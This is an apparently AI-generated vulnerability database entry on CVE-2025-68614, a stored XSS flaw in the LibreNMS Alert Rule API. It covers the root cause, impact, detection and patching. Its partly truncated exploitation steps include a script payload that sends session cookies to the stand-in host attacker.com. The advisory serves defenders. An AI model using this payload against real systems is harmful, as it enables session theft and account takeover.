
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-68614 is a stored cross-site scripting (XSS) vulnerability in the LibreNMS Alert Rule API, classified as CWE-79. It affects all LibreNMS versions prior to 25.12.0 and was discovered by Simon Humbert of Trend Research (Trend Micro) via the Zero Day Initiative (ZDI-CAN-28575). The vulnerability was disclosed on December 22–23, 2025, and patched in version 25.12.0. It carries a CVSS v3.1 base score of 5.4 (Medium) per NVD, though the GitHub Advisory Database rates it 4.3 (Moderate) (Github Advisory, ZDI Advisory).
The root cause (CWE-79) lies in the add_edit_rule() function in includes/html/api_functions.inc.php, which processes alert rule names submitted via the API without stripping HTML tags — a sanitization step that was only applied when rules were created through the web interface (Github Advisory). An attacker can inject a payload such as <script>alert(1)</script> as the alert rule name via an HTTP POST or PUT request to /api/v0/rules. When a victim navigates to the Alerts > Alert Rules page, the alert_rule_list.inc.php modal applies XML encoding via e(), but the jQuery bootgrid() function subsequently rewrites table cell content, decoding XML character references and causing the browser to interpret the injected payload as live HTML/JavaScript (Github Commit). The fix applies strip_tags() to both the name and notes fields in the API path.
Successful exploitation allows an authenticated attacker with API access to persistently inject malicious scripts into the LibreNMS interface, which execute in the browsers of any user who views the Alert Rules page. This can lead to session cookie theft, account hijacking (including administrator accounts), and unauthorized actions within the LibreNMS monitoring platform. Since LibreNMS manages network infrastructure visibility, a compromised administrator session could expose sensitive network topology data and device credentials (Github Advisory).
A proof-of-concept exploit (Python script poc.py) was published alongside the ZDI advisory and is referenced in the GitHub security advisory (ZDI Advisory, Github Advisory). Exploitation requires low attack complexity but does require the attacker to hold a privileged API key or account. There is no confirmed evidence of in-the-wild exploitation at this time. The EPSS score is approximately 0.002% (0th percentile), indicating a low near-term exploitation probability. This CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
name field, e.g., {"name": "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>", "rule": "...", ...}./api/v0/rules with the crafted payload and the API token in the X-Auth-Token header.add_edit_rule() function stores the unsanitized name directly into the database.bootgrid() jQuery function decodes the XML-encoded payload when rewriting table cells, causing the browser to execute the injected script./api/v0/rules where the name JSON field contains a < character or HTML/script tags.name parameter; repeated access to the Alerts > Alert Rules page by multiple user accounts shortly after a suspicious rule was created.alert_rules table) where the name column contains HTML tags, <script> blocks, or JavaScript event handlers.Upgrade LibreNMS to version 25.12.0 or later, which applies strip_tags() to the name and notes fields in the API's add_edit_rule() function and adds additional output encoding in the alert rule display templates (Github Commit). As an interim measure, restrict API key distribution to only trusted administrators and audit existing alert rules for any entries containing HTML or script content. Monitoring HTTP POST/PUT requests to /api/v0/rules for < characters in the name field can help detect exploitation attempts before patching.
The vulnerability was discovered and reported by Simon Humbert of Trend Research (Trend Micro) through the Zero Day Initiative program, which coordinated disclosure with the LibreNMS maintainers (ZDI Advisory). The GitHub security advisory was published on December 22, 2025, and the fix was merged promptly. No significant broader media coverage or notable community controversy has been observed beyond standard vulnerability tracking and aggregation sites.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."